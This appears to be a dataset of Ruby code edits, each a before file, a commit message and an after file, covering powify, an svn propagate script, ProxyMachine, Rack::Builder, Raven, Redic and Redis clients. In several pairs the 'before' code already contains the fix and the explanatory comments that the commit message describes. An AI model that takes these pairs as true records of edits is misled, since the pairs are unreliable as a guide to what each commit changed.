rev = "0" if rev.nil?
v = v +"_"+rev
return v
end
end
end
|
require 'json'
# powify server functions
# invoked via powify utils [COMMAND] [ARGS]
module Powify
  # Maintenance commands for the powify.dev companion app.
  # Invoked via `powify utils [COMMAND] [ARGS]`.
  class Utils
    AVAILABLE_METHODS = %w(install reinstall uninstall remove help)
    class << self
      # Dispatch args[0] (case-insensitive) to one of AVAILABLE_METHODS.
      def run(args = [])
        method = args[0].to_s.downcase
        raise "The command `#{args.first}` does not exist for `powify utils`!" unless Powify::Utils::AVAILABLE_METHODS.include?(method)
        self.send(method)
      end
      protected
      # Install (or refresh) powify.dev into the pow host root.
      # Fix: quote the interpolated hostRoot so a path containing spaces
      # (or other shell metacharacters) survives the shell.
      def install
        uninstall
        %x{git clone git@github.com:sethvargo/powify.dev.git powify && cd powify && bundle install --deployment && cd .. && mv powify "#{config['hostRoot']}"}
      end
      alias_method :reinstall, :install
      # Remove powify.dev from the pow host root (path quoted, as above).
      def uninstall
        %x{rm -rf "#{config['hostRoot']}/powify"}
      end
      alias_method :remove, :uninstall
      # Pow's runtime configuration (hostRoot etc.) from its local HTTP API.
      def config
        result = %x{curl localhost/config.json --silent --header host:pow}
        JSON.parse(result)
      end
    end
  end
end
debugging
require 'json'
# powify server functions
# invoked via powify utils [COMMAND] [ARGS]
module Powify
  # Maintenance commands for the powify.dev companion app.
  # Invoked via `powify utils [COMMAND] [ARGS]`.
  class Utils
    AVAILABLE_METHODS = %w(install reinstall uninstall remove help)
    class << self
      # Dispatch args[0] (case-insensitive) to one of AVAILABLE_METHODS.
      def run(args = [])
        method = args[0].to_s.downcase
        raise "The command `#{args.first}` does not exist for `powify utils`!" unless Powify::Utils::AVAILABLE_METHODS.include?(method)
        self.send(method)
      end
      protected
      # Install (or refresh) powify.dev into the pow host root.
      # Fix: `$stdouts` is an undefined global (nil), so `$stdouts.puts`
      # raised NoMethodError -- the stream is `$stdout`.
      def install
        uninstall
        $stdout.puts "Cloning powify.dev from github..."
        %x{git clone -q git@github.com:sethvargo/powify.dev.git powify && cd powify && bundle install --deployment && cd .. && mv powify "#{config['hostRoot']}"}
        $stdout.puts "Done!"
      end
      alias_method :reinstall, :install
      # Remove powify.dev from the pow host root.
      # Fix: quote the interpolated hostRoot so paths with spaces survive.
      def uninstall
        %x{rm -rf "#{config['hostRoot']}/powify"}
        $stdout.puts "Successfully removed powify.dev"
      end
      alias_method :remove, :uninstall
      # Pow's runtime configuration (hostRoot etc.) from its local HTTP API.
      def config
        result = %x{curl localhost/config.json --silent --header host:pow}
        JSON.parse(result)
      end
    end
  end
end
Implement Poper runner
require 'pronto'
require 'poper'
module Pronto
  # Pronto runner that reports commit-message violations found by Poper.
  class Poper < Runner
    # Run Poper over the repository at the patches' path and convert each
    # violation into a Pronto warning message.  Returns [] without patches.
    def run(patches, commit)
      return [] unless patches
      violations = ::Poper::Runner.new(commit, patches.owner.repo.path).run
      messages_for(patches, violations)
    end

    # Map Poper errors to Pronto Messages (warning level, no file/line).
    def messages_for(patches, errors)
      errors.map do |err|
        Message.new(nil, nil, :warning, err.message.capitalize, err.commit)
      end
    end
  end
end
|
Added propagate script for safe keeping.
#!/usr/bin/env ruby
# $Id: propagate 351 2009-05-29 17:50:45Z mschaffe $
require 'pathname'
require 'rexml/document'
require 'fileutils'
# Render the usage/help text.
# NOTE(review): the interpolations shell out to `svn` (via
# working_copy_url / greater_siblings) just to build this message.
def usage
<<EOF
Usage: #{File.basename($0)} <changeset>
Merges the given changeset from your current branch into any sibling
branches that are alphabetically higher than the current branch.
Your current branch is:
- #{working_copy_url}
Running propagate from this branch will merge into the following branches:
- #{greater_siblings(working_copy_url).join("\n - ")}
EOF
end
# URL of the svn working copy at `path` (default: current directory),
# scraped from the "URL:" line of `svn info` output.
def working_copy_url(path = ".")
  info = `svn info #{path}`
  info.match(/URL: (.*)$/)[1]
end
# Names of sibling branches that sort alphabetically after the current
# branch's own directory name (the propagation targets).
def greater_siblings(url)
  current = url_split(url).last
  siblings(url).select { |sibling| sibling > current }
end
# Directory entries of the parent URL with the trailing "/" stripped --
# i.e. the branch directories sitting next to the current branch.
def siblings(url)
  ls(parent(url)).select { |entry| entry =~ /\/$/ }.map { |entry| entry[0..-2] }
end
# Non-recursive `svn ls` of url, one string per entry (directories keep
# their trailing "/").
def ls(url)
`svn ls "#{url}"`.split(/\n/)
end
# Split a URL (treated as a path) into [parent, basename] strings.
def url_split(url)
  dirname, basename = Pathname.new(url).split
  [dirname.to_s, basename.to_s]
end
# Parent URL: everything before the final path component.
def parent(url)
  directory, _branch = url_split(url)
  directory
end
# Fetch the log message of `changeset` on `url`; aborts with a friendly
# message when the changeset does not exist on the branch (the REXML
# lookup raises and the rescue modifier catches it).
# NOTE(review): `abort unless log` is ineffective -- backticks always
# return a (possibly empty) String, which is truthy.
def log(changeset, url)
log = `svn log --xml -r #{changeset} #{url}`
abort unless log
REXML::Document.new(log).root.elements['logentry'].elements['msg'].text or '' rescue abort "Changeset #{changeset} doesn't exist on this branch."
end
# Bring the local checkout of a sibling branch up to date, checking it out
# first when it does not exist yet.
def update(remote, local)
if File.exist?(local)
puts "Updating local copy of #{local}..."
`svn up "#{local}"`
else
puts "Checking out #{remote} to #{local}..."
`svn co "#{remote}" "#{local}"`
end
end
# True when the svn client supports the "--accept" merge option
# (introduced in svn 1.5).
# Fix: the old check matched only the literal text "version 1.5", so
# svn 1.6 and later clients silently lost conflict handling; compare the
# major/minor numbers instead.
def using_svn_1_5?
  md = `svn --version`.match(/version (\d+)\.(\d+)/)
  return false unless md
  major = md[1].to_i
  minor = md[2].to_i
  major > 1 || (major == 1 && minor >= 5)
end
# Run `svn merge` for the revision range from:to of `source` in the
# current directory and return the list of files it touched.  A truthy
# `dryrun` only reports what would change; conflicts are postponed on
# clients that support --accept.
def merge(from, to, source, dryrun = false)
command = %(svn merge -r#{from}:#{to} "#{source}")
command += " --dry-run" if dryrun
command += " --accept postpone" if using_svn_1_5?
changed_files(command)
end
# Delete the temporary message/targets files left behind by a merge.
def cleanup(message_file, targets_file)
  [message_file, targets_file].each { |tmp| FileUtils.rm(tmp) }
end
# Commit the merged files (listed in targets_file) using the prepared
# message; temp files are removed only after a successful commit so a
# failed run can be retried.  When the merge touched no files, skip the
# commit and just clean up.
def commit(message_file, targets_file)
if File.size(targets_file) > 0
system("svn commit -F #{message_file} --targets #{targets_file}") and cleanup(message_file, targets_file)
else
cleanup(message_file, targets_file) and puts "No files changed."
end
end
# Truthy when the line is svn merge progress chatter rather than a
# "<status>  <path>" entry.
def status_message?(line)
  line =~ /Skipped.*:/ || line =~ /Merging.*:/ || line =~ /conflicts:/
end
# Run `command` (default: `svn status`) and collect the file paths from
# lines shaped like "M       path/to/file", skipping merge chatter.
def changed_files(command = "svn status")
  files = []
  IO.popen(command, 'r') do |io|
    io.each_line do |row|
      next if status_message?(row)
      files.concat(row.scan(/\w+\s+(.*)$/).flatten)
    end
  end
  files
end
# For every alphabetically-greater sibling branch: refresh (or create) a
# working copy at ../<sibling>, chdir into it, and yield the branch name.
def each_sibling(url)
greater_siblings(url).each do |sibling|
sibling_url = parent(url) + "/" + sibling
sibling_working_copy = File.join('..', sibling)
update(sibling_url, sibling_working_copy)
Dir.chdir(sibling_working_copy) do
yield sibling
end
end
end
# Name of the temp file holding the commit message for a changeset.
def message_file(changeset)
  format("propagate_%s_message.tmp", changeset)
end
# Name of the temp file listing the merge targets for a changeset.
def targets_file(changeset)
  format("propagate_%s_targets.tmp", changeset)
end
# A previous (interrupted) run left both temp files behind, meaning the
# commit should be retried instead of re-merging.
def pending_propagation_for?(changeset)
  File.exist?(message_file(changeset)) && File.exist?(targets_file(changeset))
end
# Dry-run the merge in every target branch first and abort when any file
# the merge would modify already has local changes there.  Branches with a
# pending (interrupted) propagation are skipped -- perform_merge resumes
# them later.
def check_for_outstanding_changes(changeset, url)
each_sibling(url) do |sibling|
if not pending_propagation_for?(changeset)
puts "Examining #{sibling} for outstanding changes..."
merged_files = merge(changeset - 1, changeset, url, :dryrun)
already_changed_files = merged_files & changed_files
if not already_changed_files.empty?
puts "Could not propagate changeset #{changeset} into branch #{sibling} because these files have outstanding changes:"
already_changed_files.each { |f| puts " ../#{sibling}/#{f}" }
puts "\nPlease commit or revert these files before propagation."
abort
end
end
puts
end
end
# Merge the changeset into each sibling branch and commit it with a
# "Propagating [rev]: <original message>" log.  When temp files from an
# interrupted run exist, the merge is skipped and only the commit retried.
def perform_merge(changeset, url)
each_sibling(url) do |sibling|
if pending_propagation_for?(changeset)
puts "Found temporary files for changeset #{changeset}, will retry commit."
else
puts "Merging into #{sibling}:"
merged_files = merge(changeset - 1, changeset, url)
File.open(message_file(changeset), 'w') { |f| f.print "Propagating [#{changeset}]: " + log(changeset, url) }
File.open(targets_file(changeset), 'w') { |f| f.print merged_files.join("\n") }
end
commit(message_file(changeset), targets_file(changeset)) and puts "Propagation to #{sibling} complete."
puts
end
end
# Top-level driver: validate the changeset, verify the target branches
# have no conflicting local edits, then merge+commit into each sibling.
def propagate(changeset, url)
log(changeset, url) # Trying to pull a log will cause early failure if specified changeset is not found
check_for_outstanding_changes(changeset, url)
perform_merge(changeset, url)
end
# Does the current directory contain svn metadata (.svn or _svn)?
def cwd_is_working_copy?
  %w[.svn _svn].any? { |meta| File.exist?(meta) }
end
# True when the parent directory belongs to the same checkout (i.e. we are
# inside a subdirectory of a working copy, not at its root); nil when the
# parent has no svn metadata at all.
def parent_folder_is_from_same_working_copy?
if File.exist?(File.join('..', '.svn')) or File.exist?(File.join('..', '_svn'))
working_copy_url.index(working_copy_url('..')) == 0
end
end
# At the top of a working copy: svn metadata is present here and the
# parent directory is not part of the same checkout.
def in_working_copy_root?
  cwd_is_working_copy? && !parent_folder_is_from_same_working_copy?
end
# Script entry point: must be run from the root of an svn working copy;
# ARGV[0] is the changeset number to propagate.
if in_working_copy_root?
changeset = (ARGV[0] or abort(usage)).to_i
propagate(changeset, working_copy_url)
else
abort "Please run #{File.basename($0)} from the root of a subversion working copy."
end
|
require 'rubygems'
require 'eventmachine'
require 'proxymachine/client_connection'
require 'proxymachine/server_connection'
# EventMachine-based TCP proxy: tracks live connection counts in class
# variables, mirrors them in the process title, and supports graceful
# (QUIT) and fast (TERM/INT) shutdown via the global $server handle.
class ProxyMachine
# Seconds a fast shutdown waits before hard-exiting the process.
MAX_FAST_SHUTDOWN_SECONDS = 10
# Reflect the current connection count in the process title (ps output).
def self.update_procline
$0 = "#{self.name} proxymachine: #{self.count} connections"
end
def self.name
@@name
end
# Number of live client connections.
def self.count
@@counter
end
# Called when a connection opens; returns the new count.
def self.incr
@@counter += 1
self.update_procline
@@counter
end
# Called when a connection closes.  Once the listener has been shut down
# ($server is nil) the event loop stops after the last connection drains.
def self.decr
@@counter -= 1
if $server.nil?
puts "Waiting for #{@@counter} connections to finish."
end
self.update_procline
EM.stop if $server.nil? and @@counter == 0
@@counter
end
# Store the routing block registered via the Kernel#proxy DSL.
def self.set_router(block)
@@router = block
end
def self.router
@@router
end
# Stop accepting new connections; exit once existing ones finish.
def self.graceful_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
end
# Like graceful_shutdown, but force-exit (exit!) after
# MAX_FAST_SHUTDOWN_SECONDS even if connections remain.
def self.fast_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Maximum time to wait for connections is #{MAX_FAST_SHUTDOWN_SECONDS} seconds."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
Thread.new do
sleep MAX_FAST_SHUTDOWN_SECONDS
exit!
end
end
# Boot the EventMachine loop listening on host:port and install the
# QUIT/TERM/INT signal handlers.
def self.run(name, host, port)
@@counter = 0
@@name = name
self.update_procline
EM.epoll
EM.run do
EventMachine::Protocols::ClientConnection.start(host, port)
trap('QUIT') do
self.graceful_shutdown('QUIT')
end
trap('TERM') do
self.fast_shutdown('TERM')
end
trap('INT') do
self.fast_shutdown('INT')
end
end
end
end
module Kernel
  # Config-file DSL entry point: `proxy { |data| ... }` registers the
  # routing callback with ProxyMachine.
  def proxy(&router)
    ProxyMachine.set_router(router)
  end
end
add host:port to procline
require 'rubygems'
require 'eventmachine'
require 'proxymachine/client_connection'
require 'proxymachine/server_connection'
# EventMachine-based TCP proxy: tracks live connection counts in class
# variables, mirrors them (plus the listen address) in the process title,
# and supports graceful (QUIT) and fast (TERM/INT) shutdown via $server.
class ProxyMachine
# Seconds a fast shutdown waits before hard-exiting the process.
MAX_FAST_SHUTDOWN_SECONDS = 10
# Reflect name, host:port and connection count in the process title.
def self.update_procline
$0 = "proxymachine - #{@@name} #{@@listen} - #{self.count} connections"
end
# Number of live client connections.
def self.count
@@counter
end
# Called when a connection opens; returns the new count.
def self.incr
@@counter += 1
self.update_procline
@@counter
end
# Called when a connection closes.  Once the listener has been shut down
# ($server is nil) the event loop stops after the last connection drains.
def self.decr
@@counter -= 1
if $server.nil?
puts "Waiting for #{@@counter} connections to finish."
end
self.update_procline
EM.stop if $server.nil? and @@counter == 0
@@counter
end
# Store the routing block registered via the Kernel#proxy DSL.
def self.set_router(block)
@@router = block
end
def self.router
@@router
end
# Stop accepting new connections; exit once existing ones finish.
def self.graceful_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
end
# Like graceful_shutdown, but force-exit (exit!) after
# MAX_FAST_SHUTDOWN_SECONDS even if connections remain.
def self.fast_shutdown(signal)
EM.stop_server($server) if $server
puts "Received #{signal} signal. No longer accepting new connections."
puts "Maximum time to wait for connections is #{MAX_FAST_SHUTDOWN_SECONDS} seconds."
puts "Waiting for #{ProxyMachine.count} connections to finish."
$server = nil
EM.stop if ProxyMachine.count == 0
Thread.new do
sleep MAX_FAST_SHUTDOWN_SECONDS
exit!
end
end
# Boot the EventMachine loop listening on host:port and install the
# QUIT/TERM/INT signal handlers.
def self.run(name, host, port)
@@counter = 0
@@name = name
@@listen = "#{host}:#{port}"
self.update_procline
EM.epoll
EM.run do
EventMachine::Protocols::ClientConnection.start(host, port)
trap('QUIT') do
self.graceful_shutdown('QUIT')
end
trap('TERM') do
self.fast_shutdown('TERM')
end
trap('INT') do
self.fast_shutdown('INT')
end
end
end
end
module Kernel
  # Config-file DSL entry point: `proxy { |data| ... }` registers the
  # routing callback with ProxyMachine.
  def proxy(&router)
    ProxyMachine.set_router(router)
  end
end
module Rack
# Rack::Builder implements a small DSL to iteratively construct Rack
# applications.
#
# Example:
#
# require 'rack/lobster'
# app = Rack::Builder.new do
# use Rack::CommonLogger
# use Rack::ShowExceptions
# map "/lobster" do
# use Rack::Lint
# run Rack::Lobster.new
# end
# end
#
# run app
#
# Or
#
# app = Rack::Builder.app do
# use Rack::CommonLogger
# run lambda { |env| [200, {'Content-Type' => 'text/plain'}, ['OK']] }
# end
#
# run app
#
# +use+ adds middleware to the stack, +run+ dispatches to an application.
# You can use +map+ to construct a Rack::URLMap in a convenient way.
class Builder
# Load an app from a config file; returns [app, options].
# .ru files: honor a leading "#\ ARGS" line as extra server options
# (parsed with `opts`), drop everything after __END__, and evaluate the
# remainder as Builder DSL via new_from_string.
# Other files: require them and constantize the CamelCased basename
# ("my_app.rb" -> MyApp).
def self.parse_file(config, opts = Server::Options.new)
options = {}
if config =~ /\.ru$/
cfgfile = ::File.read(config)
if cfgfile[/^#\\(.*)/] && opts
options = opts.parse! $1.split(/\s+/)
end
cfgfile.sub!(/^__END__\n.*\Z/m, '')
app = new_from_string cfgfile, config
else
require config
app = Object.const_get(::File.basename(config, '.rb').split('_').map(&:capitalize).join(''))
end
return app, options
end
def self.new_from_string(builder_script, file="(rackup)")
eval "Rack::Builder.new {\n" + builder_script + "\n}.to_app",
TOPLEVEL_BINDING, file, 0
end
# Build a new Rack application builder.
#
# default_app - app to dispatch to when no `run`/`map` is declared (may be nil).
# block       - optional DSL block, evaluated in the context of this builder
#               (so `use`/`run`/`map` inside it apply here).
def initialize(default_app = nil, &block)
  # @use    : middleware wrappers, applied in declaration order
  # @map    : path => block routes collected by #map (nil until first used)
  # @run    : the endpoint app
  # @warmup : optional warm-up callable set by #warmup
  @use, @map, @run, @warmup = [], nil, default_app, nil
  instance_eval(&block) if block_given?
end
def self.app(default_app = nil, &block)
self.new(default_app, &block).to_app
end
# Specifies middleware to use in a stack.
#
# class Middleware
# def initialize(app)
# @app = app
# end
#
# def call(env)
# env["rack.some_header"] = "setting an example"
# @app.call(env)
# end
# end
#
# use Middleware
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# All requests through to this application will first be processed by the middleware class.
# The +call+ method in this example sets an additional environment key which then can be
# referenced in the application if required.
def use(middleware, *args, &block)
if @map
mapping, @map = @map, nil
@use << proc { |app| generate_map app, mapping }
end
@use << proc { |app| middleware.new(app, *args, &block) }
end
# Takes an argument that is an object that responds to #call and returns a Rack response.
# The simplest form of this is a lambda object:
#
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# However this could also be a class:
#
# class Heartbeat
# def self.call(env)
# [200, { "Content-Type" => "text/plain" }, ["OK"]]
# end
# end
#
# run Heartbeat
def run(app)
@run = app
end
# Takes a lambda or block that is used to warm-up the application.
#
# warmup do |app|
# client = Rack::MockRequest.new(app)
# client.get('/')
# end
#
# use SomeMiddleware
# run MyApp
def warmup(prc=nil, &block)
@warmup = prc || block
end
# Creates a route within the application.
#
# Rack::Builder.app do
# map '/' do
# run Heartbeat
# end
# end
#
# The +use+ method can also be used here to specify middleware to run under a specific path:
#
# Rack::Builder.app do
# map '/' do
# use Middleware
# run Heartbeat
# end
# end
#
# This example includes a piece of middleware which will run before requests hit +Heartbeat+.
#
# Register a routing entry: requests under +path+ are handled by the app
# later built from +block+ (see #generate_map / Rack::URLMap).
def map(path, &block)
  (@map ||= {})[path] = block
end
# Assemble the final Rack app: wrap the endpoint (@run, or a URLMap built
# from the #map routes) in the middleware stack, then invoke the optional
# warm-up hook with the finished app.
#
# Raises RuntimeError if neither `run` nor `map` was declared.
def to_app
app = @map ? generate_map(@run, @map) : @run
fail "missing run or map statement" unless app
# @use holds wrappers outermost-first; reverse + inject applies them so
# the first `use` declaration ends up as the outermost middleware.
app = @use.reverse.inject(app) { |a,e| e[a] }
@warmup.call(app) if @warmup
app
end
def call(env)
to_app.call(env)
end
private
# Build a Rack::URLMap from the collected #map routes. Each route block is
# turned into a nested Builder (inheriting default_app) and compiled to an
# app; default_app, when present, is mounted at '/' as the fallback.
def generate_map(default_app, mapping)
mapped = default_app ? {'/' => default_app} : {}
mapping.each { |r,b| mapped[r] = self.class.new(default_app, &b).to_app }
URLMap.new(mapped)
end
end
end
Add space after comma in params to reflect style used everywhere else
module Rack
# Rack::Builder implements a small DSL to iteratively construct Rack
# applications.
#
# Example:
#
# require 'rack/lobster'
# app = Rack::Builder.new do
# use Rack::CommonLogger
# use Rack::ShowExceptions
# map "/lobster" do
# use Rack::Lint
# run Rack::Lobster.new
# end
# end
#
# run app
#
# Or
#
# app = Rack::Builder.app do
# use Rack::CommonLogger
# run lambda { |env| [200, {'Content-Type' => 'text/plain'}, ['OK']] }
# end
#
# run app
#
# +use+ adds middleware to the stack, +run+ dispatches to an application.
# You can use +map+ to construct a Rack::URLMap in a convenient way.
class Builder
def self.parse_file(config, opts = Server::Options.new)
options = {}
if config =~ /\.ru$/
cfgfile = ::File.read(config)
if cfgfile[/^#\\(.*)/] && opts
options = opts.parse! $1.split(/\s+/)
end
cfgfile.sub!(/^__END__\n.*\Z/m, '')
app = new_from_string cfgfile, config
else
require config
app = Object.const_get(::File.basename(config, '.rb').split('_').map(&:capitalize).join(''))
end
return app, options
end
def self.new_from_string(builder_script, file="(rackup)")
eval "Rack::Builder.new {\n" + builder_script + "\n}.to_app",
TOPLEVEL_BINDING, file, 0
end
def initialize(default_app = nil, &block)
@use, @map, @run, @warmup = [], nil, default_app, nil
instance_eval(&block) if block_given?
end
def self.app(default_app = nil, &block)
self.new(default_app, &block).to_app
end
# Specifies middleware to use in a stack.
#
# class Middleware
# def initialize(app)
# @app = app
# end
#
# def call(env)
# env["rack.some_header"] = "setting an example"
# @app.call(env)
# end
# end
#
# use Middleware
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# All requests through to this application will first be processed by the middleware class.
# The +call+ method in this example sets an additional environment key which then can be
# referenced in the application if required.
def use(middleware, *args, &block)
if @map
mapping, @map = @map, nil
@use << proc { |app| generate_map app, mapping }
end
@use << proc { |app| middleware.new(app, *args, &block) }
end
# Takes an argument that is an object that responds to #call and returns a Rack response.
# The simplest form of this is a lambda object:
#
# run lambda { |env| [200, { "Content-Type" => "text/plain" }, ["OK"]] }
#
# However this could also be a class:
#
# class Heartbeat
# def self.call(env)
# [200, { "Content-Type" => "text/plain" }, ["OK"]]
# end
# end
#
# run Heartbeat
def run(app)
@run = app
end
# Takes a lambda or block that is used to warm-up the application.
#
# warmup do |app|
# client = Rack::MockRequest.new(app)
# client.get('/')
# end
#
# use SomeMiddleware
# run MyApp
def warmup(prc=nil, &block)
@warmup = prc || block
end
# Creates a route within the application.
#
# Rack::Builder.app do
# map '/' do
# run Heartbeat
# end
# end
#
# The +use+ method can also be used here to specify middleware to run under a specific path:
#
# Rack::Builder.app do
# map '/' do
# use Middleware
# run Heartbeat
# end
# end
#
# This example includes a piece of middleware which will run before requests hit +Heartbeat+.
#
def map(path, &block)
@map ||= {}
@map[path] = block
end
def to_app
app = @map ? generate_map(@run, @map) : @run
fail "missing run or map statement" unless app
app = @use.reverse.inject(app) { |a,e| e[a] }
@warmup.call(app) if @warmup
app
end
def call(env)
to_app.call(env)
end
private
def generate_map(default_app, mapping)
mapped = default_app ? {'/' => default_app} : {}
mapping.each { |r,b| mapped[r] = self.class.new(default_app, &b).to_app }
URLMap.new(mapped)
end
end
end
|
require 'multi_json'
require 'zlib'
require 'base64'
require 'raven/version'
require 'raven/transports/http'
require 'raven/transports/udp'
module Raven
  # Client for delivering events to a Sentry server: encodes event
  # payloads, picks a transport (HTTP/HTTPS or UDP) and builds the
  # X-Sentry-Auth header.
  class Client
    # Sentry wire-protocol version. The server expects the bare major
    # version ('3'), not a dotted form like '3.0'.
    PROTOCOL_VERSION = '3'
    USER_AGENT = "raven-ruby/#{Raven::VERSION}"
    CONTENT_TYPE = 'application/json'

    attr_accessor :configuration

    def initialize(configuration)
      @configuration = configuration
    end

    # Serialize and transmit +event+ to Sentry. No-op unless the current
    # environment is configured for sending.
    def send(event)
      return unless configuration.send_in_current_environment?

      # Set the project ID correctly
      event.project = self.configuration.project_id
      Raven.logger.debug "Sending event #{event.id} to Sentry"
      content_type, encoded_data = encode(event)
      transport.send(generate_auth_header(encoded_data), encoded_data,
                     :content_type => content_type)
    end

    private

    # Encode the event hash as JSON; when the configured encoding is
    # 'gzip', deflate and base64-encode it. Returns [content_type, payload].
    def encode(event)
      encoded = MultiJson.encode(event.to_hash)
      case self.configuration.encoding
      when 'gzip'
        gzipped = Zlib::Deflate.deflate(encoded)
        b64_encoded = Base64.strict_encode64(gzipped)
        return 'application/octet-stream', b64_encoded
      else
        return 'application/json', encoded
      end
    end

    # Lazily build the transport matching the configured DSN scheme.
    # Raises Raven::Error for unknown schemes.
    def transport
      @transport ||= case self.configuration.scheme
        when 'udp'
          Transports::UDP.new self.configuration
        when 'http', 'https'
          Transports::HTTP.new self.configuration
        else
          raise Error.new("Unknown transport scheme '#{self.configuration.scheme}'")
      end
    end

    # Build the X-Sentry-Auth header value carrying the protocol version,
    # client identity, timestamp and API keys.
    def generate_auth_header(data)
      now = Time.now.to_i.to_s
      fields = {
        'sentry_version' => PROTOCOL_VERSION,
        'sentry_client' => USER_AGENT,
        'sentry_timestamp' => now,
        'sentry_key' => self.configuration.public_key,
        'sentry_secret' => self.configuration.secret_key,
      }
      'Sentry ' + fields.map{|key, value| "#{key}=#{value}"}.join(', ')
    end
  end
end
Correct protocol version (3, not 3.0)
require 'multi_json'
require 'zlib'
require 'base64'
require 'raven/version'
require 'raven/transports/http'
require 'raven/transports/udp'
module Raven
class Client
PROTOCOL_VERSION = '3'
USER_AGENT = "raven-ruby/#{Raven::VERSION}"
CONTENT_TYPE = 'application/json'
attr_accessor :configuration
def initialize(configuration)
@configuration = configuration
end
def send(event)
return unless configuration.send_in_current_environment?
# Set the project ID correctly
event.project = self.configuration.project_id
Raven.logger.debug "Sending event #{event.id} to Sentry"
content_type, encoded_data = encode(event)
transport.send(generate_auth_header(encoded_data), encoded_data,
:content_type => content_type)
end
private
def encode(event)
encoded = MultiJson.encode(event.to_hash)
case self.configuration.encoding
when 'gzip'
gzipped = Zlib::Deflate.deflate(encoded)
b64_encoded = Base64.strict_encode64(gzipped)
return 'application/octet-stream', b64_encoded
else
return 'application/json', encoded
end
end
def transport
@transport ||= case self.configuration.scheme
when 'udp'
Transports::UDP.new self.configuration
when 'http', 'https'
Transports::HTTP.new self.configuration
else
raise Error.new("Unknown transport scheme '#{self.configuration.scheme}'")
end
end
def generate_auth_header(data)
now = Time.now.to_i.to_s
fields = {
'sentry_version' => PROTOCOL_VERSION,
'sentry_client' => USER_AGENT,
'sentry_timestamp' => now,
'sentry_key' => self.configuration.public_key,
'sentry_secret' => self.configuration.secret_key,
}
'Sentry ' + fields.map{|key, value| "#{key}=#{value}"}.join(', ')
end
end
end
|
Reality+meth is fun
def Object.const_missing(name)
Reality::Entity(name.to_s.gsub('_', ' '))
end
class Numeric
BANNED_METHODS = %i[to_s to_str to_a to_ary to_h to_hash]
def method_missing(name, *arg, &block)
super unless arg.empty? && !block
super if name =~ /\?!$/ || BANNED_METHODS.include?(name)
Reality::Measure(self, name.to_s)
end
end
|
require "redic/connection"
require "uri"
class Redic
# Thin connection manager for a single Redis server: lazily (re)opens the
# socket, authenticates, expires idle connections after a TTL, and
# serializes command/response exchanges with a mutex.
class Client
def initialize(url)
@uri = URI.parse(url)
# Seconds a connection may go unused before being considered stale;
# configurable via the REDIC_TTL environment variable (default 60).
@ttl = Integer(ENV.fetch("REDIC_TTL", 60))
@connection = nil
@semaphore = Mutex.new
end
# Read one reply from the wire. Callers should hold the mutex (see #connect).
def read
@connection.read
end
# Write one command to the wire. Callers should hold the mutex (see #connect).
def write(command)
@connection.write(command)
end
# Ensure a live connection, then run the given block while holding the
# mutex so concurrent callers cannot interleave commands and replies.
# A reset connection (ECONNRESET) is dropped and the exchange retried.
def connect
establish_connection unless connected?
# Refresh the liveness timestamp on every use.
timestamp_connection
@semaphore.synchronize do
yield
end
rescue Errno::ECONNRESET
@connection = nil
retry
end
private
# Open a new socket, wrapping low-level failures with the target URI for
# context, then authenticate if the URI carries a password.
def establish_connection
begin
@connection = Redic::Connection.new(@uri)
rescue StandardError => err
raise err, "Can't connect to: %s" % @uri
end
authenticate
end
# Record when the connection was last used (drives #alive?).
def timestamp_connection
@timestamp = Time.now.to_i
end
# Issue AUTH when the URI includes a password; holds the mutex since it
# performs a write/read round trip.
def authenticate
if @uri.password
@semaphore.synchronize do
write [:auth, @uri.password]
read
end
end
end
# A connection is usable only if the socket is open AND it was used
# within the TTL window.
def connected?
@connection && @connection.connected? && alive?
end
# True while the last use is within @ttl seconds.
# NOTE(review): @timestamp is nil until the first #connect; this is only
# reached once @connection exists, which implies a prior timestamp.
def alive?
Time.now.to_i - @timestamp < @ttl
end
end
end
Remove TTL from connections.
require "redic/connection"
require "uri"
class Redic
class Client
def initialize(url)
@uri = URI.parse(url)
@connection = nil
@semaphore = Mutex.new
end
def read
@connection.read
end
def write(command)
@connection.write(command)
end
def connect
establish_connection unless connected?
@semaphore.synchronize do
yield
end
rescue Errno::ECONNRESET
@connection = nil
retry
end
private
def establish_connection
begin
@connection = Redic::Connection.new(@uri)
rescue StandardError => err
raise err, "Can't connect to: %s" % @uri
end
authenticate
end
def authenticate
if @uri.password
@semaphore.synchronize do
write [:auth, @uri.password]
read
end
end
end
def connected?
@connection && @connection.connected?
end
end
end
|
require "redis/errors"
require "socket"
require "cgi"
class Redis
class Client
DEFAULTS = {
:url => lambda { ENV["REDIS_URL"] },
:scheme => "redis",
:host => "127.0.0.1",
:port => 6379,
:path => nil,
:timeout => 5.0,
:password => nil,
:db => 0,
:driver => nil,
:id => nil,
:tcp_keepalive => 0
}
def scheme
@options[:scheme]
end
def host
@options[:host]
end
def port
@options[:port]
end
def path
@options[:path]
end
def timeout
@options[:timeout]
end
def password
@options[:password]
end
def db
@options[:db]
end
def db=(db)
@options[:db] = db.to_i
end
attr_accessor :logger
attr_reader :connection
attr_reader :command_map
def initialize(options = {})
@options = _parse_options(options)
@reconnect = true
@logger = @options[:logger]
@connection = nil
@command_map = {}
end
def connect
@pid = Process.pid
establish_connection
call [:auth, password] if password
call [:select, db] if db != 0
self
end
def id
@options[:id] || "redis://#{location}/#{db}"
end
def location
path || "#{host}:#{port}"
end
# Send a single command and return its reply; replies that are
# CommandError instances are raised instead. When a block is given, the
# reply is yielded to it and the block's result is returned.
def call(command, &block)
  reply = process([command]) { read }
  raise reply if reply.is_a?(CommandError)
  block ? block.call(reply) : reply
end
def call_loop(command)
error = nil
result = without_socket_timeout do
process([command]) do
loop do
reply = read
if reply.is_a?(CommandError)
error = reply
break
else
yield reply
end
end
end
end
# Raise error when previous block broke out of the loop.
raise error if error
# Result is set to the value that the provided block used to break.
result
end
def call_pipeline(pipeline)
with_reconnect pipeline.with_reconnect? do
begin
